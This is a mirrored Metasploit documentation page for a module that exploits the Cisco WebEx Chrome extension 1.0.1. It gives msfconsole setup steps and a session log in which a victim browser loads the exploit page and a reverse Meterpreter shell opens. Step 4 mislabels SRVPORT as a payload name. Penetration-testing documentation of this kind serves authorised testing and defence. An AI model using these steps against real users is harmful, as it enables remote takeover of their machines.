CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/browser/cisco_webex_ext.md
Views: 1904

Vulnerable Application

Cisco WebEx is a suite of applications for online meeting organization and video conferencing. Included in this suite are extensions for popular web browsers which ease use and provide supplemental features.

Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution.

Cisco WebEx Chrome Extension 1.0.1 is known to be affected.

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/windows/browser/cisco_webex_ext

  3. Do: set SRVHOST [IP ADDRESS]

  4. Do: set SRVPORT [PAYLOAD NAME]

  5. Do: set URIPATH [ARBITRARY URI]

  6. Do: Choose a payload and set any specific options

  7. Do: run, after a target browses to the generated URL, you should receive a session like the following:

Scenarios

msf > use exploits/windows/browser/cisco_webex_ext
msf exploit(cisco_webex_ext) > set srvhost 10.6.0.151
srvhost => 10.6.0.151
msf exploit(cisco_webex_ext) > set srvport 4567
srvport => 4567
msf exploit(cisco_webex_ext) > set uripath not_a_very_good_meeting
uripath => not_a_very_good_meeting
msf exploit(cisco_webex_ext) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.6.255.229:4444
[*] Using URL: https://10.6.0.151:4567/not_a_very_good_meeting
[*] Server started.
msf exploit(cisco_webex_ext) > [*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting
[*] 10.6.0.151       cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
[*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html
[*] 10.6.0.151       cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
[*] 10.6.0.151       cisco_webex_ext - Sending exploit html ...
[*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting/qt3iFe8N
[*] 10.6.0.151       cisco_webex_ext - From:
[*] 10.6.0.151       cisco_webex_ext - Sending payload ...
[*] Sending stage (957487 bytes) to 10.6.255.229
[*] Meterpreter session 1 opened (10.6.255.229:4444 -> 10.6.255.229:57472) at 2017-01-26 13:27:28 -0600

msf exploit(cisco_webex_ext) >